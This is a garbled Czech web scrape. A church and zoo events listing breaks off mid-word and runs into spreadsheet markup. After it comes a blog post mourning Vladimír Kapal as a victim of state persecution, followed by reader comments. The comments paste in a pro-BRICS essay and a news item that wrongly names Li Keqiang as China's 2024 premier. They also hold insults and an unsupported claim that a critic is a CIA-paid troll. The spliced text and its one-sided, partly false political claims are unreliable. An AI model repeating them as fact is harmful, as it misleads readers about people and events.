5. 11. – 3. 12. • 18.30–20.00 Promítaní seriálu The chosen V průběhu listopadu až do 3. prosince se bude každé úterý od 18.30 hod v Křesťanském centru Třináctka (u metra Luka) pokračovat ve večerech Objevujeme křesťanství. Tentokrát se budou promítat díly seriálu The chosen, který je teď po světě velkým hitem. Tvůrci v něm skvěle zpracovali skutečné příběhy ze života Ježíše Krista , jeho následovníků a lidí kolem. Některé postavy byly dotvořeny tak, aby lépe vynikly jejich charaktery a to, jak je změnilo setkání s Ježíšem. Po zhlédnutí každého dílu si ještě chvíli budeme povídat ve skupinkách o dobovém pozadí a otázkách, které v nás příběh vyvolal. Ale především o Ježíši a jeho životě, který je ztvárněn výborně právě pro současného diváka. Seriál není vůbec "suchý", naopak - obsahuje vtipné dialogy či dojemné scény. Zkrátka, vtáhne vás a už se budete těšit na další díl. Všichni jsou zváni, registrace není nutná, lehké občerstvení zajištěno. Pondělky • 16.30–18.00 Dětský klub Savana Pravidelné schůzky našeho křesťanského klubu pro děti od 6 do 10 let (po první třídě ZŠ). Další info na www.klubsavana.webnode.cz. Středy • 18.30–20.30 Setkání klubu "Mládež" Jsme otevřenou skupinou ve věku zhruba 16 - 23 roků. Více na www.facebook.com/mladez13. Pátky • 16.00–18.30 Klub Robinson Outdoorový klub pro děti a mládež ve věku 10-15 let. Více na www.klubrobinson.cz. Neděle • 9.00–10.15; 11.00–12.15 Nedělní bohoslužby Otevřená setkání, kde může každý příchozí slyšet to, co je pro nás nejdůležitější – dobrou zprávu (evangelium) o tom, že Ježíš Kristus přichází za člověkem. Zároveň hledáme, jak zvěst Bible promlouvá do naší každodenní reality, se kterou každý člověk zápasí. Součástí bohoslužeb je i program pro děti. První bohoslužbu lze sledovat živě na www.13ka.cz/stream. Informace o dalších aktivitách na www.13ka.cz. ZOOLOGICKÁ ZAHRADA HL. M. PRAHY U Trojského zámku 120/3, Praha 7 V říjnu je otevírací doba od 9.00 do 16.00. Pokladny zavírají půl hodiny před koncem otevírací doby. Komentovaná krmení a setkání - probíhají o víkendech a svátcích. Navštivte zvířata tehdy, kdy jsou nejaktivnější, a odhalte zajímavosti z jejich života. Setkání s oblíbenými zvířaty doplněná poutavým vyprávěním se konají po celý den - stačí si jen vybrat! Venkovní program probíhá jen za hezkého počasí. Výstavy: Jurta: Koně Převalského na Dívčích hradech Terasa před Vzdělávacím centrem: Návrat divokých koní do Kazachstánu . Pátek 1. 11. Podzimní prázdniny v zoo – speciální dýňové hody u zvířat Program pro děti i dospělé v rámci podzimních prázdnin. Páteční dýňové hody u vybraných druhů zvířat. Pátek 1. 11. Diwali – svátek světel Oblíbený večerní lampionový průvod připomene hinduistický svátek světel Diwali. Každý, kdo do zoo přijde s vlastním LED lampionem, bude mít od 16.00 do 17.00 vstup do zahrady za jednu korunu! (Vstup na tuto akci je možný pouze severním vchodem do zoo . Lampionový průvod: Účast je možná pouze s lampiony s led žárovkou. Není možné se účastnit průvodu s lampionem s klasickou svíčkou. Sraz účastníků u severního vstupu do zoo je v 16.30, předpokládaný konec akce okolo 19.00. Sobota 9. 11. Zooškola pro dospělé na téma Zbavte se fobií Mnoho z nás trpí v dospělosti iracionálním strachem z některých zvířat - např. hadů či pavouků. Je vědecky dokázané, že fobie jsou z velké části naučené a jejich prožívání lze zmírnit. Zkušení lektoři vás seznámí s obávanými tvory a trpělivou edukací a postupným seznamováním se pokusí nahradit negativní pocity pozitivní zkušeností do dalšího života. Sobota 9. 11. Richard slaví 33. narozeniny Oblíbený gorilí samec Richard slaví 33. narozeniny. Přij</t>
  </si>
  <si>
    <t>32500</t>
  </si>
  <si>
    <t>20241101_15_3264689658_7eb5a61d6fc915f5d46a.html</t>
  </si>
  <si>
    <t>7eb5a61d6fc915f5d46a</t>
  </si>
  <si>
    <t xml:space="preserve">Shrnutí O kolaboranta míň... Autor Vidlák a.a. Štítky Vladimír Kapal dezinformace svoboda slova Toto napsal jistý Martin Beer do diskuse na mém fejsbůkovém profilu. Dodal k tomu, že je to sice tvrdé, ale je to tak. O kom myslíte, že to napsal? Napsal to senátorovi Krausovi, který zemřel na embolii, protože to byl zarytý ODSák, který podporoval tuto vládu? Ne, napsal to o Vladimíru Kapalovi, zakladateli svobodného rádia, který zemřel tento čtvrtek nad ránem po dlouhé těžké nemoci. Vladimír Kapal byl jeden z průkopníků toho, co dneska mezi námi, dezoláty, už dělá každý. Jestliže velká mééédia lžou, nadržují jedné straně a vymlčují důležitá témata, je zapotřebí si udělat vlastní média. A tak si na důchod založil internetové Svobodné rádio, kam si zval ty, které by Česká televize nikdy nepozvala, na klidné a příjemné debaty. Nebojoval proti mediálním lžím, že by jim zapaloval auta. Neposílal reportérům výhružné dopisy. Prostě si založil rádio a mluvil tam o věcech, o kterých se jinde nemluvilo. A nakonec na to doplatil životem. Za jeho rozhovor s Josefem Skálou, kde rozebírali události v Katyni , se oba dostali před soud. To víte, byl srpen 2022 a válka na Ukrajině byla jasně vyhraná, naše vláda už si kolíkovala Luhanskou oblast, kterou bude po válce obnovovat a Rusko to zaplatí válečnými reparacemi. Tehdy se jiné názory nevyvracely, tehdy se prostě blokovaly i s weby, kde byly zveřejněny. I soudci podle toho soudili a tak se po dlouhém chození na soudní stání dozvěděl od Nejvyššího soudu, že „vybočil z rámce běžných projevů a jeho společenská škodlivost je o to vyšší, protože prohlubuje nedůvěru v demokracii a právní stát.“ V dnešní době se proti jiným názorům nepostupuje po hitlerovsku, ale po kafkovsku. Dneska na vás nepošlou gestapo, ale státní a justiční byrokracii. Nikdo vás nestřelí do týla za rozvracení jejich krásných pořádků, ale uštvou vás. Zákony už na to máme. Můžete být souzen i když jste nikomu nezpůsobili škodu. Smažou vám profil i bez soudního příkazu… Dneska se nevolá policie, ale volá se Zuckerbergovi, že o laptopu Huntera Bidena se na fejsbůku prostě psát nebude. Dneska vám nevezmou počítač, ale vezmou vám chuť k životu. Vladimíra Kapala nakonec po dvouletém trápení dohnala mrtvice. Nebyl k tomu zapotřebí ani jeden „tajnej,“ který by chodil všude za ním. Žádní divní páni mu nevyhrožovali. Jen mu řádně chodila předvolání a výhružky od spořádaných občanů… Psům, psí smrt! Nakonec se to podařilo. A může za to samozřejmě mrtvice… tak to stojí v protokolu. Není tam jméno žádného kata a vlastně ani soudce. Jak to napsal Karel Kryl ? Demokracie dozrála do žaludečních vředů… A dnes o něm jistý Martin Beer řekl, že alespoň je o kolaboranta míň. Pravděpodobně nikdy neslyšel žádný jeho pořad ani rozhovor a ve skutečnosti vůbec neví, kdo Vladimír Kapal byl. Jen se o něm na nějakém liberálním plátku dozvěděl to nejhorší. Někde napsali, že Kapal je kolaborant, bodrý Čech to vzal jako fakt a přišel si zatančit u jeho památníku. Nijak si to neověřoval, protože dneska se přece věří vládě, médiím i institucím. A kdo jim nevěří, je svině a je zapotřebí kolem něj vykopat příkop a postavit plot. Když zemřel senátor Kraus, vyjadřovali mu jeho odpůrci soustrast a mluvili o tom, jak je to zasáhlo. Když zemře Vladimír Kapal, je to důvod k exhibicím, protože v jeho případě se to může a nikdy nepřijde ani soudní příkaz, ani předvolání od policie ohledně přestupku, jak se to stalo Máje Šabinské. Radost nad tím, že je o kolaboranta míň, ta je svobodou projevu chráněná, ale běda, kdyby se takhle někdo vyjadřoval o Krausovi. To už by policie u něj klepala… chlubili se, že jsou schopni internetovou nenávist odhalovat do čtyřiadvaceti hodin. Smrt Vladimíra Kapala mě zasáhla o to víc, že sedím na stejném tygrovi a jsem ohrožen tím samým, co ho přivedlo do hrobu. Je to připomínka toho, že boj za svobodu má i v dnešní pokrokové liberální demokracii své oběti. A také je připomínka, že je mezi námi stále dost lidí, kteří se jen třesou na to, až se budou moci vybít z těch nejnižších pudů. Dnes jsem na jednu lahev portského napsal Vladimírovo jméno a uložil. Zůstane nedotčena tak dlouho, dokud v tomto boji nezvítězíme. Dokud nezničíme tuhle kafkovskou dystopii. Dokud nebude platit, že svoboda slova je především svoboda říkat věci, které lidi nechtějí slyšet. Vypiju ji s přáteli, až bude běžné, že vás za buřičské řeči posadí do studia České televize proti nějakému odborníkovi na dané téma a ten vás bude mlátit po hlavě argumenty, nikoliv soudními příkazy. Vladimíre, čest Tvé památce. Zvedl jsou korouhev tohoto boje jako jeden z prvních. Snad ji dokážeme nést dál alespoň tak dlouho, jako jsi ji nesl Ty. Hodnocení Průměrný počet slepic: 4.9 (456 hlasů) Log in to post comments Komentáře Napsal uživatel včelka Mája dne Pá, 01. 11. 2024, 22:06 Trvalý odkaz Vzpomínání (k 2. listopadu) -------------------------------------------------- Každý z nás má v nebi někoho, komu by chtěl poděkovat za to, že BYL a říct mu: „ MOC MI CHYBÍŠ“ (Ze života) Průměrný počet slepic: 4.9 (190 hlasů) Log in to post comments Napsal uživatel včelka Mája dne Pá, 01. 11. 2024, 22:10 Trvalý odkaz * A kdo je Beer. Nějaký malý bezvýznamný libtardí pivo ... Průměrný počet slepic: 4.7 (110 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 12:06 In reply to * by včelka Mája Trvalý odkaz natočené ze špinavých trubek Průměrný počet slepic: 4.5 (28 hlasů) Log in to post comments Napsal uživatel Mirekxy dne Pá, 01. 11. 2024, 22:14 Trvalý odkaz Beer.... To nebude ani malý pivo . To budou nějaký rezavý chcanky. Průměrný počet slepic: 4.6 ( 101 hlas) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 11:20 In reply to Beer.... by Mirekxy Trvalý odkaz Nejspíš z júesej Jednou jsme od námořníků dostali pivo z júesej, skutečný chcanky (na rozdíl od piva australského) , ale do dobré nálady nás přivedlo stejně. Sice ne pivo samotné, nýbrž nápis na pixle: "Pozor! Užívání tohoto nápoje vede k opilosti!" Průměrný počet slepic: 4.7 (29 hlasů) Log in to post comments Napsal uživatel Inza dne Pá, 01. 11. 2024, 22:26 Trvalý odkaz BRICS po Kazani : laboratoř budoucnosti Dlouho očekávané setkání hlav států BRICS v ruské Kazani nezklamalo. Tato mnohostranná instituce konečně přinesla konkrétní řešení mnoha globálních finančních a politických hádanek, které dlouho bránily vytvoření nového globálního řádu. Pepe Escobar 30.10.2024 - zkráceno Ruské předsednictví BRICS 2024 si nemohlo pro pořádání summitu zatíženého obrovským očekáváním globální většiny vybrat multikulturnější a různorodější místo. Jihozápadní ruské město Kazaň na březích řek Volhy a Kazanky je hlavním městem poloautonomní republiky Tatarstán , která je proslulá živou směsicí tatarské a ruské kultury. Přestože se summit BRICS konal na výstavišti Kazaň Expo - jakési víceúrovňové stanici propojené s letištěm a s expresním spojením do města - byl to právě Kazaňský kreml , staletá opevněná citadela a památka světového dědictví, který se stal symbolem BRICS 2024. Právě citadela podtrhla kontinuitu od 10. století přes bulharskou kulturu, Zlatou hordu a chanát 15.-16. století až po moderní Tatarstán . Kazaňský kreml je poslední tatarskou pevností v Rusku se zbytky původní architektury. Světová muslimská umma nezapomněla poznamenat, že se jedná o severozápadní hranici šíření islámu v Rusku . Minarety mešity Kul Šaríf v Kremlu tak vlastně získaly ikonický rozměr - symbolizují kolektivní, transkulturní, civilizačně-státní úsilí o vybudování rovnějšího a spravedlivějšího světa. Bylo mimořádným zážitkem sledovat po celý rok, jak se ruské diplomacii daří dojednávat účast na summitu v Kazani . Zúčastnily se delegace ze 36 zemí - z toho 22 bylo zastoupeno hlavami států, účast přijalo i šest mezinárodních organizací včetně OSN . Tyto delegace pocházely ze zemí, které představují téměř polovinu světového HDP. Z toho vyplývá, že tsunami tisíců sankcí uvalených od roku 2022 na Rusko a neutuchající křik o "izolaci" Ruska prostě zmizely ve víru zapomnění. To přispělo k nesmírnému podráždění, které kolektivní Západ nad tímto pozoruhodným setkáním projevil. Klíčový podtext: v Kazani nebyla přítomna jediná oficiální účast sestavy Five Eyes - USA , V.Británie, Kanada , Austrálie a Nový Zéland . Cesta vpřed, z Asie do muslimského světa První kolo rozšiřování BRICS v loňském roce se soustředilo především na západní Asii a severovýchodní Afriku ( Írán , Spojené arabské emiráty, Egypt a Etiopie , přičemž Saudská Arábie o svém konečném statusu teprve rozhoduje). Nyní vznikla nová kategorie partnerů, která má 13 členů: Alžírsko , Bělorusko , Bolívie , Kuba , Indonésie , Kazachstán , Malajsie , Nigérie , Thajsko , Turecko , Uganda , Uzbekistán a Vietnam . Muslimské země jsou v rámci snah BRICS všude; současně se Asie jako celek rychle stává hlavním územím BRICS. Hluboká debata o tom, jak vytvořit nový globální finanční a platební systém prakticky od nuly - klíčový pilíř dewesternizace - probíhá od února neúnavně napříč BRICS. Začátkem října ruské ministerstvo financí oznámilo spuštění projektu BRICS Bridge - digitální platební platformu pro přeshraniční obchod v národních měnách. Klíčovou otázkou - vážnou starostí pro globální většinu - je způsob vypořádání obchodních přebytků a deficitů. Pokud jde o iniciativy, jako je BRICS Bridge a BRICS Pay - zkušební provoz karty BRICS Pay proběhl týden před Kazaní -, není to technický problém. Nezáleží ani tak na tom, jak měnu poslat, ale co s ní udělat na druhém konci. Je to záležitost výsostně politická, ale existují způsoby, jak ji obejít, protože převládající, Západem kontrolovaný systém SWIFT je velmi primitivní. Vše výše uvedené ztělesňuje ducha toho, že BRICS začne v roce 2024 fungovat - pod vedením ruského předsednictví - jako globální laboratoř, v níž se budou testovat všechny možné modely, staré i nové, které se budou uplatňovat ve více uzlech . Z diplomatického hlediska Kazaňská deklarace uvádí, že nové přístupy by měly být předloženy OSN a skupině G20; reálně však nic nenasvědčuje tomu, že by je kolektivní západní blok přijal s otevřenou náručí. Drobné detaily de-dolarizace Kromě ustavení 13 nových partnerů - tvořících rozsáhlou transkontinentální zónu BRICS - Kazaň prosazovala dvě klíčové platformy: BRICS Clear a BRICS Insurance Company . BRICS Clear je mnohostranný systém zúčtování/vypořádání jak pro obchod BRICS, tak pro obchod mezi BRICS a jejich partnery (v současné podobě se vztahuje na 22 zemí). Hlavním cílem je opět obejít systém SWIFT. BRICS Clear bude pro mezinárodní obchod používat národní měny. Vše bude probíhat prostřednictvím stablecoinu - zúčtovací jednotky - spravované bankou BRICS se sídlem v Šanghaji . Obchod vyžaduje pojišťovací služby (jak pro samotný kontrakt, tak pro přepravu); tyto pojišťovací služby zahrnují zajišťovací činnosti. Prostřednictvím pojišťovny BRICS si BRICS buduje nezávislost na západních pojišťovnách". BRICS Clear a BRICS Insurance budou mít v krátkodobém až střednědobém horizontu obrovské důsledky pro světový obchod a používání amerických dolarů a eur. Obchodní toky, a to jak v rámci BRICS , tak mezi partnery BRICS, které již nyní představují nejméně 40 % celosvětového objemu, mohou exponenciálně vzrůst. Souběžně s tím přijdou západem kontrolované pojišťovny a zajišťovny o mnoho svých klientů. To je de-dolarizace v praxi - pravděpodobně svatý grál BRICS. Do roku 2030 může efekt BRICS Clear vést k tomu, že podíl dolaru na rezervách světových centrálních bank klesne "z 58 % na přibližně 35-40 %". Menší dolarové rezervy centrálních bank povedou k tlaku na trh amerických státních dluhopisů a mohou způsobit značné potíže pro americké ministerstvo financí při refinancování dluhu Spojených států ". Hegemon to nebude brát přinejmenším na lehkou váhu. Laboratorní experimenty proti aroganci Tyto geoekonomické průlomy BRICS - říkejme tomu laboratorní experimenty - odrážejí diplomatické převraty, jako když Indie a Čína za zprostředkování Ruska oznámily v předvečer Kazaně svou snahu urovnat bilaterální problémy v Himálaji , aby podpořily sjednocující, pan-kooperativní agendu BRICS . Cílem pan-kooperativní agendy je dosažení shody a jednotného přístupu k problémům, které přesahují hranice jednotlivých států Řešení geopolitických otázek mezi členskými zeměmi je klíčovou prioritou BRICS. Příklad Číny a Indie by se měl přenést na Írán a Saudskou Arábii , pokud jde o jejich angažmá v Jemenu , a na Egypt a Etiopii , pokud jde o kontroverzní stavbu velké přehrady na Nilu . Zasvěcení úředníci BRICS otevřeně přiznávají, že BRICS potřebuje vnitřní institucionální mechanismus pro řešení závažných problémů mezi členskými státy - a případně partnery. A tím se dostáváme k největší žhavé tragédii: izraelským vojenským ofenzivám v Gaze , Palestině , Libanonu , Jemenu , Sýrii a Íránu . Neoficiální zdroje z BRICS prozradily, že na uzavřených zasedáních i na dvoustranných schůzkách se aktivně diskutovalo o dvou scénářích. První předpokládá íránsko-izraelskou horkou válku , přičemž Libanon se promění v hlavní bojiště, což povede k "řetězové reakci" zahrnující několik arabských aktérů. Druhý scénář předpokládá celozápadní asijskou krizi , do níž by se zapojily nejen sousední země, ale i to, co by se spojilo do koalic - jedna proarabská, druhá proizraelská. Je otázkou, kam by zapadli pochybní aktéři jako Egypt a Jordánsko . Není jasné, jak by BRICS jako multilaterální organizace reagoval na oba scénáře. Nepochopení kolektivního Západu pro to, co se odehrálo během tří historických dnů v Kazani , jen zdůraznilo jeho ohromující aroganci, hloupost a brutalitu. Právě to je důvod, proč země BRICS tak usilovně pracují na tom, aby realizovaly nový, spravedlivější mezinárodní řád, který navzdory řadě současných problémů bude i nadále vzkvétat. Průměrný počet slepic: 4.8 (122 hlasů) Log in to post comments Napsal uživatel Libor52 dne Pá, 01. 11. 2024, 22:37 Trvalý odkaz Vidláku, byl jsi výborný. Český Krumlov. .... vysíláno dnes stál za to, jen nevím kam dříve. Mám podezření, že pan Kapal je vlastně první oběť díky politice (Vonka, Toufar ale to byly jiné okolnosti) a vlastně kvůli úplně nevinnému a zástupnému tématu jako byla Katyně (dva roky starý rozhovor). To ale bylo namířeno hlavně proti Skálovi jako prezidentskému kandidátu. Tak že se dá předpokládat že pohřeb pana Kapala bude další národní probuzení. Sice smutné, ale může to vstoupit do historie. Pokud to bude jen trochu možné, tak v pátek osmého tam budu. Pohřeb Petránka jsem prošvihl, ale tady budu. PS: Vidlák se v Krumlově zmínil že jeho Kydy sleduje denně 300 tisíc lidí, což je více než OVM. Doporučuji shlédnout proto že tam nastiňuje i taktiku "ovládání společnosti" s minimálními náklady a velikým dosahem, viz zde na webu. Gratuluji. Průměrný počet slepic: 4.8 (122 hlasů) Log in to post comments Napsal uživatel včelka Mája dne Pá, 01. 11. 2024, 22:42 Trvalý odkaz Neskutečně se bavím nad tím, - jak se pětikoaliční tábor může zvencnout z toho, že Robert Fico udělal rozhovor pro ruskou televizi. Za prvé pan premiér jako profesionální politik moc dobře ví, že komunikace je lepší než ostentativní mlčení a vyhrožování si nepřátelskými kroky, a za druhé je z jeho pohledu určitě racionálnější bavit se s ruskými médii než s liberálně propagandistickými plátky placenými zahraničními zájmovými skupinami typu Forum24 nebo Deník N. Ostatně, když se mě kdysi Deník N ptal na to, jestli mi nevadí dělat rozhovory s dezinformačními médii, tak jsem jim odpověděl následovně: "Důkazem toho, že mluvím s každým, tedy i s médii prokazatelně šířícími lži a propagandu, je fakt, že se právě teď bavím s vámi." Na to už paní redaktorka neměla jak odpovědět. 🙂 (FB J. Rajchla) Průměrný počet slepic: 4.8 (170 hlasů) Log in to post comments Napsal uživatel Inza dne Pá, 01. 11. 2024, 23:17 In reply to Neskutečně se bavím nad tím, by včelka Mája Trvalý odkaz Čínský premiér jednal se slovenským premiérem Aktualizováno: 1. listopadu 2024 21:57 Xinhua PEKING , 1. listopadu - Čínský premiér Li Kche-čchiang jednal v pátek v Pekingu s premiérem Slovenska Robertem Ficem. Li uvedl, že Slovensko je jednou z prvních zemí, které navázaly diplomatické vztahy s Čínou , a konstatoval, že za posledních 75 let se čínsko-slovenské vztahy rozvíjely zdravě a stabilně. Obě strany se těší vzájemnému respektu, rovnosti a přátelské spolupráci, což oběma národům přináší hmatatelné výhody, dodal. Čína je ochotna udržovat se slovenskou stranou vzájemnou politickou důvěru na vysoké úrovni, poznamenal Li s tím, že obě strany by měly rozšířit spolupráci vedenou vysoce kvalitním rozvojem Pásma a stezky. Li uvedl, že obě země by měly plně využít úlohu společného hospodářského výboru a výboru pro vědeckotechnickou spolupráci a podporovat spolupráci v oblastech, jako je čínsko-evropský železniční expres, konektivita a výstavba infrastruktury. Obě strany by měly dále rozšířit objem dvoustranného obchodu a prozkoumat potenciál spolupráce v nově vznikajících odvětvích, jako je digitální ekonomika a zelená ekonomika, aby společně podpořily nové ekonomické hnací síly pro obě země, uvedl Li. Čína a Slovensko by měly společně usilovat o zajištění lepšího podnikatelského prostředí pro podniky ve svých zemích, uvedl premiér. Poznamenal, že obě strany by měly pokračovat ve zlepšování výměn v oblasti kulturní turistiky, vědy, vzdělávání, sportu, médií, mládeže a dalších oblastech mezilidských výměn a podporovat zakládání kulturních center v zemích druhé strany s cílem posílit vzájemné porozumění a přátelství mezi oběma národy. Za svou stranu Fico zmínil, že rozvojové úspěchy Číny v posledních letech jsou příkladem pro země celého světa. Uvedl, že Slovensko podporuje globální iniciativy navrhované Čínou . Slovensko pevně dodržuje politiku jedné Číny a uznává, že vláda Čínské lidové republiky je jedinou legální vládou zastupující celou Čínu , řekl Fico . Premiér uvedl, že Slovensko nesouhlasí s dodatečnými cly uvalenými EU na čínské elektromobily, a dodal, že EU a Čína by měly hledat vhodné řešení prostřednictvím dialogu a konzultací. Uvedl, že Slovensko je ochotno posílit výměnu a koordinaci s Čínou v mezinárodních záležitostech s cílem společně řešit globální výzvy. Po jednání byli Li a Fico svědky podpisu několika dokumentů o dvoustranné spolupráci v oblasti dopravy, hospodářství a obchodu, kultury, cestovního ruchu a ekologického a nízkouhlíkového rozvoje. Průměrný počet slepic: 4.9 (144 hlasů) Log in to post comments Napsal uživatel Alice20 dne So, 02. 11. 2024, 09:49 In reply to Čínský premiér jednal se slovenským premiérem by Inza Trvalý odkaz Bez ohledu na Pépéčka... Bez ohledu na Pépéčka, z nichž jedním je zřejmě i ten "dobrák" Beer, trošku jen odbočím od Vidlákova článku... všimla jsem si, že ačkoliv se jedná o foto z nedemokratické, zlé, komunistické, lidskoprávadusící Číny , kde je vše špatně, jak nám předkládají soudruzi z ÚV ČT a spol., tak Čína je asi jednou z mála zemí, která do čestné jednotky postaví i holky. Přitom považte ... nikdo jim tam nenutí všelijaké ty Mééééééétoooooo , gendery a podobné nesmysly. Oni to tam tak zařídili sami od sebe a ta čestná jednotka má hned tak trochu jiný říz. Jo a s "Nutiči" něčeho by zřejmě byli asi taky hned hotovi. ( Nutiči totiž nemají odvahu tam jít, a mistrovat Číňany u nich doma, aby tohle a tohle, na to je takový Nutič zbabělý). Zřejmě postavení muže, ženy a rodiny u nich bude mít trochu jiný význam, než jsou "moderní" měřítka, která se snaží nastavit řada politiků a jejich fanatických přisluhovačů z řad neziskovek a podobných ve vyspělém Západním světě.. Vysvětlivky : Pépéčko - PP - Pokřivený Prašivec, neštítící se přát jiným smrt, radující se z neštěstí druhých a adorující různá jiná svinstva. ÚV ČT - Ústřední vykladač Česká televize - jediné médium, chrlící "zaručenou a uvědomělou" pravdu. Nutič - Trotl, snažící se rozbít vše, co je tradiční, vyzkoušené a funkční po staletí. Průměrný počet slepic: 4.7 ( 61 hlas) Log in to post comments Napsal uživatel Zauber dne So, 02. 11. 2024, 16:33 In reply to Bez ohledu na Pépéčka... by Alice20 Trvalý odkaz Ty vojandy sice vypadají dobře, ale normální asi nejsou. Mě zbraně a buzerace nikdy nepřitahovaly. Průměrný počet slepic: 4.3 (8 hlasů) Log in to post comments Napsal uživatel Libor52 dne So, 02. 11. 2024, 16:49 In reply to Ty vojandy by Zauber Trvalý odkaz Sice vypadají dobře ale vojandy? Mně jako šoféra Tir jednou chytly "celnice" jindy policistky a jejich názor byl "je to také zaměstnání". Ale dorazil mně nápis na zádi dodávky. Obrázek selky a nad ním nápis "jezdím proto že musím". Tak že s možností že holky mohou vše, proč ne. Už prý jim někde navrhly těhotenské uniformy a prý také budou zřizovat školky při zaměstnání. Průměrný počet slepic: 4.9 (8 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 17:55 In reply to Ty vojandy by Zauber Trvalý odkaz něco proti paní prezidentové ? 😁😁 Průměrný počet slepic: 4.9 (7 hlasů) Log in to post comments Napsal uživatel Itkica dne Pá, 01. 11. 2024, 23:04 Trvalý odkaz Pan Kapal "Kauzu" jsem sledovala po celou dobu, protože se týkala pana doktora Skály, kterého si vážím jako člověka i jako historika a výborného rétora (naposledy teď na Václavském náměstí 28.10.). A tak jsem registrovala soudní proces, který se jich týkal, tedy i pana Kapala. Věděla jsem, že ho v důsledku odsouzení postihla mrtvice. A že jeho přítelkyně se po dobu jeho nemoci obracela na soudy, instituce. A teď i na prezidenta jak bylo uvedeno před pár dny na Parlamentkách. Bohužel jak psala nikdo jí nikdy neodpověděl, nereagoval! Velmi smutné i vypovídající. A komentáře těch "nelidských" děsivé. Upřímnou soustrast! Průměrný počet slepic: 4.9 (128 hlasů) Log in to post comments Napsal uživatel Jaroslav136 dne Pá, 01. 11. 2024, 23:24 In reply to Pan Kapal by Itkica Trvalý odkaz Nelidských? Řekl bych, že je je to spíš hýkavý smích hyen nad kořistí. A jásavý taneček kleine beer nad smrtí člověka patří do stejného ranku. Rétor byl skvělý, obrovská slovní zásoba a když mluvil, znělo to jako verše. Novinář ze starého těsta. Průměrný počet slepic: 4.8 (85 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 00:11 In reply to Nelidských? by Jaroslav136 Trvalý odkaz Jaroslav136 "Nelidští tvorové", bylo mnou myšleno, jsou všichni ti, kteří komentují tímto způsobem úmrtí člověka, o kterém třeba vůbec neslyšeli, nic nevěděli, ale z jejich pohledu si to náhle zaslouží jen kvůli jinému názoru, schvalují i teroristické činy, chtějí druhé "vykrvit", nenajdou kousek soucitu ani slušnosti aspoň mlčet! Prskají tu žluč a agresi kolem sebe. Diskuze jsou jich bohužel plné... A netýká se to jen "politiky". A jak stále píše Vidlák, dvojí kilometr. Neboť co je dovoleno Jovovi není dovoleno volovi Průměrný počet slepic: 4.9 (75 hlasů) Log in to post comments Napsal uživatel Mec dne Pá, 01. 11. 2024, 23:50 Trvalý odkaz Moc smutné Pana Kapala jsem poslouchával na Svobodném rádiu. Pokaždé po 19 hodině měl nějakého hosta, který se do mainstreamu nedostával - i když se občas stávalo, že jsem s ním úplně nesouhlasil, tak i přesto to byla velká osobnost, která bude chybět. Čest jeho památce Průměrný počet slepic: 4.8 (67 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 00:21 Trvalý odkaz Památka zesnulých A už je po půlnoci a jsou Dušičky, tak láskyplné vzpomenutí na naše milované co už tu s námi bohužel nejsou... Průměrný počet slepic: 4.9 (67 hlasů) Log in to post comments Napsal uživatel iw23 dne So, 02. 11. 2024, 08:10 Trvalý odkaz O kolaboranta míň Je to smutné, jak šiřitelé západnich hodnot to pojali jako lítý boj proti názorovým oponentům, a to na život a na smrt (doslova). A my přitom jenom chceme, aby se naše připomínky k věcem veřejným braly v potaz. Abychom se bavili i o věcech co se jim nelíbí. Oni taky mluví a hlavně dělají věci, které se nám nelíbí a k tomu zavádějí ve vládě velmi kontroverzní věci, aniž by se vedla nějaká veřejná diskuse. Nejhorší ale na tom je, že si myslí, že jsou na straně pravdy a lásky. Neuvěřitelné toto. Ale co čekat od lidí typu signatářů petice "S komunisty se nemluví". Teď už se s nimi zase mluví, už se i volí do funkcí a nemluví se pro změnu zase s dezolátama. Ta nenávist v těch lidech zůstává, jenom se přeorientovala na jinou skupinu. Tu nenávist tady ale někdo šíří, řídí a podporuje, a nejspíš to bude někdo ze zahraničí. A Putin to nebude. Je hodně pravděpodobné, že komentář pod nickem Martin Beer napsal nějaký západem placený troll. A už se zase obloukem dostáváme k CIA , která má podvratnou činnost v popisu práce (a rozhodně nepracuje pro blaho naší země). Zajišťuje totiž směřování všech zemí do područí USA a to jakýmikoliv prostředky včetně násilí. Říkám si ale, že když existují trollové placení, zlí a nenávistní, tak by klidně mohli existovat i trollové zadarmo, věcní a inteligentní. A protože jsme národ počítačových (a gaučových) bojovníků, tak si dovedu představit, že bychom dokázali ten první druh i přečíslit. Protože asi nikdy nebude naše země vypadat podle našich představ, dokud je tady necháme bez odporu takhle řádit..........Howgh Edit (v 9:30) : tak jsem koukal na FB na diskuse pod příspěvky vládních i opozičních předsedů stran (+ Turek, Konečná a Rajchl) a musím konstatovat, že k přečíslení už došlo :-) . A nejen vládní politici ale i ten Babiš dostává pořádnou čočku, přestože to bude mít na jeho výsledek ve volbách pramalý vliv. Dokonce i diskuse na Seznamzprávách a Novinkách už nejsou tak agresivní jak si pamatuji před cca 2 lety. Asi musím i já připustit, že se veřejné mínění pomalu začíná posouvat kýženým směrem a že je reálná šance, že hyeny typu Martin Beer už brzy budou minulostí Průměrný počet slepic: 4.8 (46 hlasů) Log in to post comments Napsal uživatel Starý Kocour dne So, 02. 11. 2024, 09:42 Trvalý odkaz Ta nenávist je spíše snaha nějak si ulevit, zbavit se frustrace, upozornit na sebe. Beztrestně. Zbaběle. Výkřiky ze tmy. A protože diskuze jsou plné takových výkřiků, často nenajdu sílu je číst. Bezmezná svoboda vyjadřování vede k tomu, že asi přestanu číst současníky vůbec. Číst taková slova od lidi, kteří se na zebe snaží jen upozornit nemá smysl. Průměrný počet slepic: 4.8 (22 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 11:02 In reply to Ta nenávist by Starý Kocour Trvalý odkaz Starý Kocour Souhlasím s vámi. Je to pro mnohé takový ventil na přetlak ze všeho kolem. A také je to často stranický, údernický úkol. A také je to pomatenost z vymývání hlav a špatného vidění reality. Určitě všichni vnímáme jak je tady agrese ve více směrech podporována. Tak jako bohužel víceméně vše co může škodit, vyhrocovat a ještě více "rozdělovat". Vykřikovat tedy i hnusy tzv. anonymně, ale anonymně zase platí jen pro některé, ten stále častější dvoumetr. Některé sociopatické "výkřiky" jsou opravdu šokující. A je určitým druhem masochismu je číst. Také s tím mám velký problém. Jenže platí i to "poznej nepřítele"... Průměrný počet slepic: 4.8 (20 hlasů) Log in to post comments Napsal uživatel Mirekxy dne So, 02. 11. 2024, 10:12 